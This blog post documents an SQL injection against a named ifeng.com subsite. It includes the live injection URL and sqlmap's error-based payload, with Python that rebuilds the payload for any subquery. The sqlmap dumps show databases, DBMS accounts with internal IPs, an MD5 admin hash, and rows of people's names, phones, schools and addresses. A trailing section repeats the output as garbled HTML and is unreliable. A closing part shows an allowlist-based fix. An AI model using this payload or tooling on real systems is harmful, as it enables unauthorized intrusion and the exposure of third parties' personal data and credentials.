
SQL injection vulnerability in an ifeng.com (凤凰网) subsite_MySQL

mysql  搞代码  4 years ago (2022-01-09)  17 views  indexed  0 comments

Injection point (ifeng.com subsite SQL injection): http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined

Appending a single quote and hitting Enter produced a database error that also leaked the server's filesystem path, so I threw the URL into sqlmap.

After that, everything came out.
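The payload sqlmap settled on (see its output further down) is worth a closer look before the dumps. The Python below is an added example, not code from the original write-up or from ifeng.com. It decodes the two hex literals in the payload (sqlmap's delimiters), rebuilds the payload shape around any scalar subquery, and parses the leaked value back out of the MySQL "Duplicate entry" error that the FLOOR(RAND(0)*2) GROUP BY trick provokes. The error line it parses is constructed for the example. Note that although sqlmap labels the technique "WHERE or HAVING clause", the parameter here is order_by, so the injected text lands in an ORDER BY: `undefined AND (SELECT ...)` is a legal sort expression, MySQL evaluates it, and the error surfaces in the JSONP response just as the single-quote test showed.

```python
"""Added example, not from the original write-up: anatomy of the error-based
payload sqlmap reported against the order_by parameter, and recovery of the
leaked value from MySQL's duplicate-key error text."""
import re
from typing import Optional

# The two hex literals from the reported payload. sqlmap wraps the value it
# wants to read back between them so it can locate it in the error message.
PREFIX_HEX = "0x3a6176673a"
SUFFIX_HEX = "0x3a7464663a"


def decode_hex_literal(lit: str) -> str:
    """Turn a MySQL hex literal (0x3a6176673a) into the string MySQL sees (':avg:')."""
    return bytes.fromhex(lit[2:]).decode("ascii")


def build_error_based_payload(expr: str, tag: int = 6107) -> str:
    """Rebuild the payload shape from the sqlmap output around any scalar subquery.

    Why it errors: FLOOR(RAND(0)*2) with a fixed seed yields a repeatable
    sequence (starting 0, 1, 1, ...) as rows are read. Used as the GROUP BY key
    over a table with at least three rows (INFORMATION_SCHEMA.CHARACTER_SETS
    here), the key expression is evaluated once for the lookup and again for the
    insert into the temporary grouping table, so the same key is inserted twice
    and MySQL aborts with "Duplicate entry '<key>' for key 'group_key'". The key
    text is the CONCAT() result, so it carries the subquery's value.
    """
    return (
        f"AND (SELECT {tag} FROM(SELECT COUNT(*),CONCAT({PREFIX_HEX},"
        f"({expr}),{SUFFIX_HEX},FLOOR(RAND(0)*2))x "
        f"FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    )


def expected_error_text(value: str) -> str:
    """Constructed stand-in for the MySQL error line the payload provokes; the
    wording is MySQL's, only the leaked value in the key changes."""
    return (
        "ERROR 1062 (23000): Duplicate entry "
        f"'{decode_hex_literal(PREFIX_HEX)}{value}{decode_hex_literal(SUFFIX_HEX)}1' "
        "for key 'group_key'"
    )


def extract_from_error(error_text: str) -> Optional[str]:
    """Pull the leaked value out of a duplicate-key error; None if the markers are absent."""
    prefix = re.escape(decode_hex_literal(PREFIX_HEX))
    suffix = re.escape(decode_hex_literal(SUFFIX_HEX))
    m = re.search(prefix + r"(.*?)" + suffix, error_text, re.S)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(decode_hex_literal(PREFIX_HEX), decode_hex_literal(SUFFIX_HEX))
    print(build_error_based_payload("SELECT user()"))
    print(extract_from_error(expected_error_text("root@localhost")))
```

With the confirmation probe from the output, `SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)`, the function reproduces the reported payload byte for byte; swapping the probe for `SELECT user()` or `SELECT schema_name FROM information_schema.schemata LIMIT 0,1` is all sqlmap does to walk from "is it injectable" to the database and user lists shown below.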

First, the database list.

Then I checked whether the current user is DBA (it is), and then listed the DBMS user accounts.

That list completely exposes internal IP addresses (10.x and 192.168.x ranges) and the addresses of other database hosts that are allowed to connect.

The rest is in the sqlmap output below. One detail worth pulling out of it: the wiki_user tables keep passwords in a char(32) column, and the house_admin value e10adc3949ba59abbe56e057f20f883e is the bare MD5 of 123456.

<code>
sqlmap identified the following injection points with a total of 1624 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---

available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test

database management system users [234]:
[*] ''@'localhost'
[*] 'B74wNuTbbx'@'10.11.2.89'
[*] 'B74wNuTbbx'@'10.11.2.90'
[*] 'B74wNuTbbx'@'10.13.2.134'
[*] 'B74wNuTbbx'@'10.13.2.135'
[*] 'B74wNuTbbx'@'10.13.2.176'
[*] 'B74wNuTbbx'@'10.13.2.177'
[*] 'B74wNuTbbx'@'220.181.67.192'
[*] 'iadmin'@'211.151.61.77'
[*] 'root'@'10.13.2.132'
[*] 'root'@'10.13.2.134'
[*] 'root'@'10.13.2.135'
[*] 'root'@'10.13.2.176'
[*] 'root'@'10.13.2.177'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.2.162'
[*] 'root'@'192.168.2.167'
[*] 'root'@'220.181.24.100'
[*] 'root'@'220.181.24.166'
[*] 'root'@'220.181.24.2'
[*] 'root'@'220.181.67.192'
[*] 'root'@'localhost'
[*] 'zabbix'@'127.0.0.1'

current user is DBA:    'True'

Database: app_bbs
[1 table]
+------+
| dkjs |
+------+

Database: baike_house
[32 tables]
+-----------------------+
| wiki_activation       |
| wiki_advertisement    |
| wiki_attachment       |
| wiki_autosave         |
| wiki_banned           |
| wiki_blacklist        |
| wiki_category         |
| wiki_channel          |
| wiki_comment          |
| wiki_creditdetail     |
| wiki_doc              |
| wiki_docreference     |
| wiki_edition          |
| wiki_focus            |
| wiki_friendlink       |
| wiki_language         |
| wiki_lock             |
| wiki_plugin           |
| wiki_pluginhook       |
| wiki_pluginvar        |
| wiki_pms              |
| wiki_regular          |
| wiki_regular_relation |
| wiki_regulargroup     |
| wiki_session          |
| wiki_setting          |
| wiki_style            |
| wiki_synonym          |
| wiki_task             |
| wiki_user             |
| wiki_usergroup        |
| wiki_word             |
+-----------------------+

Database: baike_house
Table: wiki_user
[22 columns]
+------------+-----------------------+
| Column     | Type                  |
+------------+-----------------------+
| birthday   | int(10) unsigned      |
| checkup    | int(10) unsigned      |
| creates    | mediumint(8) unsigned |
| credits    | int(10)               |
| edits      | mediumint(8) unsigned |
| email      | char(50)              |
| gender     | tinyint(1)            |
| groupid    | smallint(6) unsigned  |
| image      | varchar(255)          |
| language   | varchar(20)           |
| lastip     | char(15)              |
| lasttime   | int(10) unsigned      |
| location   | varchar(30)           |
| password   | char(32)              |
| regip      | char(15)              |
| regtime    | int(10) unsigned      |
| signature  | text                  |
| style      | varchar(20)           |
| timeoffset | varchar(20)           |
| uid        | mediumint(8) unsigned |
| username   | char(15)              |
| views      | int(10) unsigned      |
+------------+-----------------------+

Database: baike_house
Table: wiki_user
[10 entries]
+-----+---------+-------+---------+-------+-------+-------+-------------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+
| uid | groupid | image | style   | edits | views | regip | email             | gender | lastip         | checkup | regtime    | credits | creates | lasttime   | location | username        | birthday | password                         | language | signature | timeoffset |
+-----+---------+-------+---------+-------+-------+-------+-------------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+
| 1   | 4       |       | default | 0     | 59    |       | [email protected] | 0      | 220.181.24.2   | 1       | 1270174931 | 21      | 0       | 1270174967 |          | house_admin     | 0        | e10adc3949ba59abbe56e057f20f883e | zh       |           | 8          |
| 2   | 4       |       | default | 2     | 171   |       |                   | 0      | 220.181.67.192 | 1       | 0          | 41      | 1       | 1286971633 |          | 冠缨豺郎        | 0        |                                  | zh       |           | 8          |
| 3   | 2       |       | default | 0     | 29    |       |                   | 0      |                | 1       | 0          | 20      | 0       | 0          |          | zhaoxiaoxiong   | 0        |                                  | zh       |           | 8          |
| 4   | 4       |       | default | 44    | 825   |       |                   | 0      | 220.181.67.192 | 1       | 0          | 264     | 23      | 1287390647 |          | 漫巴            | 0        |                                  | zh       |           | 8          |
| 5   | 8       |       | default | 7     | 1140  |       |                   | 0      | 220.181.24.2   | 1       | 0          | 663     | 124     | 1270429517 |          | 西瓜妹          | 0        |                                  | zh       |           | 8          |
| 6   | 2       |       | default | 0     | 29    |       |                   | 0      |                | 1       | 0          | 20      | 0       | 0          |          | zhuantou        | 0        |                                  | zh       |           | 8          |
| 7   | 2       |       | default | 0     | 30    |       |                   | 0      |                | 1       | 0          | 20      | 0       | 0          |          | c100            | 0        |                                  | zh       |           | 8          |
| 8   | 8       |       | default | 7     | 1183  |       |                   | 0      | 220.181.24.2   | 1       | 0          | 794     | 150     | 1270959387 |          | 金鱼77          | 0        |                                  | zh       |           | 8          |
| 9   | 2       |       | default | 0     | 31    |       |                   | 0      |                | 1       | 0          | 20      | 0       | 0          |          | qq15236958@sina | 0        |                                  | zh       |           | 8          |
| 10  | 7       |       | default | 0     | 793   |       |                   | 0      | 220.181.24.2   | 1       | 0          | 533     | 102     | 1270545218 |          | qq15236958      | 0        |                                  | zh       |           | 8          |
+-----+---------+-------+---------+-------+-------+-------+-------------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+

Database: baike_house
Table: wiki_user
[11 entries]
+-----+---------+-------+---------+-------+-------+-------+-------+--------+--------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+
| uid | groupid | image | style   | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username     | birthday | password | language | signature | timeoffset |
+-----+---------+-------+---------+-------+-------+-------+-------+--------+--------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+
| 100 | 2       |       | default | 0     | 6     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | yangganghong | 0        |          | zh       |           | 8          |
| 101 | 2       |       | default | 0     | 6     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | 肖张氏       | 0        |          | zh       |           | 8          |
| 102 | 2       |       | default | 0     | 6     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | hanruikai    | 0        |          | zh       |           | 8          |
| 103 | 2       |       | default | 0     | 7     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | cbgwllcjt    | 0        |          | zh       |           | 8          |
| 104 | 2       |       | default | 0     | 4     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | gk777        | 0        |          | zh       |           | 8          |
| 105 | 2       |       | default | 0     | 4     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | 品酸         | 0        |          | zh       |           | 8          |
| 106 | 2       |       | default | 0     | 3     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | daiyb        | 0        |          | zh       |           | 8          |
| 107 | 2       |       | default | 0     | 6     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | 欧阳君山     | 0        |          | zh       |           | 8          |
| 108 | 2       |       | default | 0     | 3     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | 小马不识途   | 0        |          | zh       |           | 8          |
| 109 | 2       |       | default | 0     | 6     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | gxy891029    | 0        |          | zh       |           | 8          |
| 110 | 2       |       | default | 0     | 6     |       |       | 0      |        | 1       | 0       | 20      | 0       | 0        |          | 晓飞416329   | 0        |          | zh       |           | 8          |
+-----+---------+-------+---------+-------+-------+-------+-------+--------+--------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+

Database: baike_health
[35 tables]
+------------------------+
| wiki_activation        |
| wiki_advertisement     |
| wiki_attachment        |
| wiki_autosave          |
| wiki_banned            |
| wiki_blacklist         |
| wiki_category          |
| wiki_category_20100224 |
| wiki_channel           |
| wiki_comment           |
| wiki_creditdetail      |
| wiki_doc               |
| wiki_doc_20100224_20   |
| wiki_doc_temp_copy     |
| wiki_docreference      |
| wiki_edition           |
| wiki_focus             |
| wiki_friendlink        |
| wiki_language          |
| wiki_lock              |
| wiki_plugin            |
| wiki_pluginhook        |
| wiki_pluginvar         |
| wiki_pms               |
| wiki_regular           |
| wiki_regular_relation  |
| wiki_regulargroup      |
| wiki_session           |
| wiki_setting           |
| wiki_style             |
| wiki_synonym           |
| wiki_task              |
| wiki_user              |
| wiki_usergroup         |
| wiki_word              |
+------------------------+

Database: baike_health
Table: wiki_user
[11 entries]
+-----+---------+-------+---------+-------+-------+-------+-------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+
| uid | groupid | image | style   | edits | views | regip | email | gender | lastip         | checkup | regtime | credits | creates | lasttime   | location | username       | birthday | password | language | signature | timeoffset |
+-----+---------+-------+---------+-------+-------+-------+-------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+
| 100 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | 新娘jiujiu     | 0        |          | zh       |           | 8          |
| 101 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | 江湖一鸣       | 0        |          | zh       |           | 8          |
| 102 | 2       |       | default | 0     | 40    |       |       | 0      | 59.175.185.178 | 1       | 0       | 21      | 0       | 1267751010 |          | erxy           | 0        |          | zh       |           | 8          |
| 103 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | fuf            | 0        |          | zh       |           | 8          |
| 104 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | 墨侃           | 0        |          | zh       |           | 8          |
| 105 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | maiky1987      | 0        |          | zh       |           | 8          |
| 106 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | yantachenzhong | 0        |          | zh       |           | 8          |
| 107 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | chen0928       | 0        |          | zh       |           | 8          |
| 108 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | 高老庄0560     | 0        |          | zh       |           | 8          |
| 109 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | 为了国家的80后 | 0        |          | zh       |           | 8          |
| 110 | 2       |       | default | 0     | 0     |       |       | 0      |                | 1       | 0       | 20      | 0       | 0          |          | bxbglg123      | 0        |          | zh       |           | 8          |
+-----+---------+-------+---------+-------+-------+-------+-------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+

Database: app_bbs
Table: dkjs
[3 entries]
+-----+------+--------+----------------------------------+-------------+--------------------------+--------+--------+--------+--------+--------+--------------------------+----------+---------------------+
| id  | city | name   | story                            | phone       | school                   | is_wap | photo3 | verify | photo2 | photo1 | address                  | province | submit_time         |
+-----+------+--------+----------------------------------+-------------+--------------------------+--------+--------+--------+--------+--------+--------------------------+----------+---------------------+
| 122 | 南阳 | 李果   | 失业,多次评为优秀教师,模范班主任 | 130****6030 | 河南邓州市穰东镇葛营小学 | 0      | 4      | yes    | 4      | 4      | 河南省邓州市穰东镇****** | 河南     | 2010-02-05 16:08:03 |
| 123 |      | 晓清   |                                  | 130****9166 | 某学校                   | 0      | 4      | yes    | 4      | 4      | 湖南                     | 湖南     | 2010-02-05 16:14:31 |
| 124 | 梧州 | 郭伟民 |                                  | 138****1590 | 岑溪市樟木镇思孟联办中学 | 0      | 4      | yes    | 4      | 4      | 岑溪市城中路**号         | 广西     | 2010-02-05 16:14:38 |
+-----+------+--------+----------------------------------+-------------+--------------------------+--------+--------+--------+--------+--------+--------------------------+----------+---------------------+

Database: apphistory_news
[5 tables]
+-------------+
| figure      |
| hot_tag     |
| relate_news |
| relate_pic  |
| stats       |
+-------------+

Database: app_weather
[5 tables]
+-------------+
| abroad      |
| airport     |
| internal    |
| nephogram   |
| relate_news |
+-------------+
</code>
clause<br />	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_news<br />[23 tables]<br />+-----------------------------+<br />| hash						|<br />| hdphoto					 |<br />| ip_test					 |<br />| lianghui_2010			 |<br />| lianghui_2010_copy_20100226 |<br />| lianghui_2010_lhyl		|<br />| lianghui_2012			 |<br />| lianghui_2012_lhyl		|<br />| special_diqiuyixiaoshi2010|<br />| special_martyr			|<br />| special_qinghaiyushudizhen|<br />| special_xinanhanzai		 |<br />| timeline					|<br />| tw_vote					 |<br />| upload					|<br />| upload_20121116			 |<br />| upload_v					|<br />| user_test				 |<br />| vote_category			 |<br />| vote_detail				 |<br />| weather_yb				|<br />| weather_yb_tomorrow		 |<br />| weather_zh				|<br />+-----------------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br />	Type: error-based<br />	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_news<br />Table: user_test<br />[2 entries]<br />+----+--------------+------+---------+-------------+---------------------+<br />| id | ip		 | lock | intro | username	| rec_time			|<br />+----+--------------+------+---------+-------------+---------------------+<br />| 1| 220.181.24.2 |	|  | wangyun1127 | 2010-05-10 14:27:06 |<br />| 2| 220.181.24.2 |	| c100	| c100		| 0000-00-00 00:00:00 |<br />+----+--------------+------+---------+-------------+---------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br />	Type: error-based<br />	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_news<br />Table: hash<br />[10 entries]<br />+----+--------------+--------+<br />| id | name		 | value|<br />+----+--------------+--------+<br />| 1| ygdx_gd	| 258	|<br />| 2| ygdx_bsd	 | 306	|<br />| 3| ygdx_zmd	 | 57	 |<br />| 4| ygdx_time	| 5月8日 |<br />| 5| wudu2010_hlb | 198864 |<br />| 6| wudu2010_szc | 150782 |<br />| 7| wudu2010_wyc | 0	|<br />| 8| wudu2010_xsh | 0	|<br />| 9| wudu2010_wwm | 0	|<br />| 10 | wudu2010_zll | 358715 |<br />+----+--------------+--------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br />	Type: error-based<br />	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_news<br />Table: lianghui_2012<br />[10 entries]<br />+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br />| id | type | title | verify | delete | cai_num | content | ding_num | user_name	| user_type | click_num | debate_num | submit_time		 |<br />+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br />| 1| 1	| 1	 | 1	|		| 2	 | 1	 | 3		| kuaibo_10501 | 1		 | 7		 | 0		| 2012-02-28 17:44:30 |<br />| 2| 1	| 11	| 1	|		| 0	 | 1	 | 1		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:47 |<br />| 3| 1	| 2	 | 1	|		| 0	 | 2	 | 1		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:54 |<br />| 4| 1	| 3	 | 1	|		| 0	 | 3	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:59 |<br />| 5| 1	| 4	 | 1	|		| 0	 | 4	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:47:05 |<br />| 6| 1	| 5	 | 1	|		| 1	 | 5	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:47:09 |<br />| 7| 1	| 5	 | 1	|		| 1	 | 5	 | 20	 | kuaibo_10501 | 1		 | 97		| 0		| 2012-02-29 15:47:17 |<br />| 8| 1	| 6	 | 1	|		| 0	 | 6	 | 5		| kuaibo_10501 | 1		 | 107	 | 0		| 2012-02-29 15:47:22 |<br />| 9| 1	| 7	 | 1	|		| 0	 | 7	 | 91	 | kuaibo_10501 | 1		 | 235	 | 0		| 2012-02-29 15:47:26 |<br />| 10 | 1	| 8	 | 1	|		| 2	 | 8	 | 2		| kuaibo_10501 | 1		 | 97		| 0		| 2012-02-29 15:47:31 |<br />+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br />	Type: error-based<br />	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />	Payload: 
callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br />	Type: error-based<br />	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />available databases [11]:<br />[*] app_bbs<br />[*] app_news<br />[*] app_weather<br />[*] apphistory_news<br />[*] appmil_news<br />[*] appsports_news<br />[*] baike_health<br />[*] baike_house<br />[*] information_schema<br />[*] mysql<br />[*] test<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br />	Type: error-based<br />	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />current user is DBA:	'True'<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: 
order_by<br />	Type: error-based<br />	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />database management system users [234]:<br />[*] ''@'localhost'<br />[*] 'B74wNuTbbx'@'10.11.2.89'<br />[*] 'B74wNuTbbx'@'10.11.2.90'<br />[*] 'B74wNuTbbx'@'10.13.2.134'<br />[*] 'B74wNuTbbx'@'10.13.2.135'<br />[*] 'B74wNuTbbx'@'10.13.2.176'<br />[*] 'B74wNuTbbx'@'10.13.2.177'<br />[*] 'B74wNuTbbx'@'220.181.67.192'<br />[*] 'iadmin'@'211.151.61.77'<br />[*] 'root'@'10.13.2.132'<br />[*] 'root'@'10.13.2.134'<br />[*] 'root'@'10.13.2.135'<br />[*] 'root'@'10.13.2.176'<br />[*] 'root'@'10.13.2.177'<br />[*] 'root'@'127.0.0.1'<br />[*] 'root'@'192.168.2.162'<br />[*] 'root'@'192.168.2.167'<br />[*] 'root'@'220.181.24.100'<br />[*] 'root'@'220.181.24.166'<br />[*] 'root'@'220.181.24.2'<br />[*] 'root'@'220.181.67.192'<br />[*] 'root'@'localhost'<br />[*] 'zabbix'@'127.0.0.1'</code>

Remediation:

Add proper protection against SQL injection.
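The injection point sqlmap reported is the `order_by` parameter, and a sort column is the one input that prepared statements cannot protect on their own: an ORDER BY target is an identifier, not a value, so it can never be bound as a placeholder and must instead be chosen from a fixed allowlist. The example below is an added illustration, not the site's code (the real endpoint is PHP on MySQL; here it is Python on an in-memory sqlite3 table with an assumed `user_test` schema and constructed rows). It binds the search values, casts `page`/`limit` to bounded integers, maps `order_by`/`order_type` through allowlists, and treats the literal string `undefined` that the front-end sent for empty fields as "not supplied" rather than passing it into the query.

```python
"""Hardened search-parameter handling for a user-chosen sort column.

Added illustration in Python/sqlite3; the reported endpoint is PHP on MySQL,
and the table/column names here are assumptions, not the real application's.
"""
import sqlite3

# ORDER BY column and direction cannot be bound as parameters, so they are
# mapped through fixed allowlists; anything not in the map is rejected.
ALLOWED_ORDER_BY = {"id": "id", "username": "username", "rec_time": "rec_time"}
ALLOWED_ORDER_TYPE = {"asc": "ASC", "desc": "DESC"}
DEFAULT_LIMIT, MAX_LIMIT = 20, 50

# Constructed sample data, not rows from the report.
SAMPLE_ROWS = [
    (1, "alice", "beijing", "haidian", "2010-05-10 14:27:06"),
    (2, "bob", "beijing", "chaoyang", "2011-01-02 09:00:00"),
    (3, "carol", "shanghai", "pudong", "2012-02-29 15:46:47"),
]


def _clean(value):
    """Treat a missing value and the literal string 'undefined' (what the
    front-end in the report sends for empty fields) as 'not supplied'."""
    if value is None or value == "undefined":
        return None
    return str(value)


def build_query(params):
    """Return (sql, bind_values); raise ValueError for off-allowlist input."""
    keyword = _clean(params.get("keyword")) or ""
    province = _clean(params.get("province")) or ""
    city = _clean(params.get("city")) or ""
    try:
        page = max(1, int(_clean(params.get("page")) or 1))
        limit = min(MAX_LIMIT, max(1, int(_clean(params.get("limit")) or DEFAULT_LIMIT)))
    except ValueError:
        raise ValueError("page and limit must be integers")
    order_col = ALLOWED_ORDER_BY.get(_clean(params.get("order_by")) or "id")
    order_dir = ALLOWED_ORDER_TYPE.get((_clean(params.get("order_type")) or "asc").lower())
    if order_col is None or order_dir is None:
        raise ValueError("unsupported sort column or direction")
    # Only allowlisted identifiers are interpolated into the SQL text;
    # every user-supplied value travels through a bound placeholder.
    sql = (
        "SELECT id, username, province, city, rec_time FROM user_test "
        "WHERE username LIKE ? AND province LIKE ? AND city LIKE ? "
        f"ORDER BY {order_col} {order_dir} LIMIT ? OFFSET ?"
    )
    binds = (f"%{keyword}%", f"%{province}%", f"%{city}%", limit, (page - 1) * limit)
    return sql, binds


def run_search(params):
    """Execute the search against an in-memory table; return matching ids."""
    conn = sqlite3.connect(":memory:")
    try:
        conn.execute(
            "CREATE TABLE user_test (id INTEGER PRIMARY KEY, username TEXT, "
            "province TEXT, city TEXT, rec_time TEXT)"
        )
        conn.executemany("INSERT INTO user_test VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
        sql, binds = build_query(params)
        return [row[0] for row in conn.execute(sql, binds)]
    finally:
        conn.close()


if __name__ == "__main__":
    print(run_search({"province": "beijing", "order_by": "id", "order_type": "desc"}))
    try:
        # A sort column carrying an injected subquery never reaches the SQL text.
        run_search({"order_by": "id AND (SELECT 1 FROM (SELECT COUNT(*)) x)"})
    except ValueError as exc:
        print("rejected:", exc)
```

The rejection path is the point: a request whose `order_by` is anything other than a known column name fails before any SQL is assembled, which is the only defence that works for identifiers. The same allowlist pattern applies to table names, column lists and sort directions wherever an application lets the client pick them.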

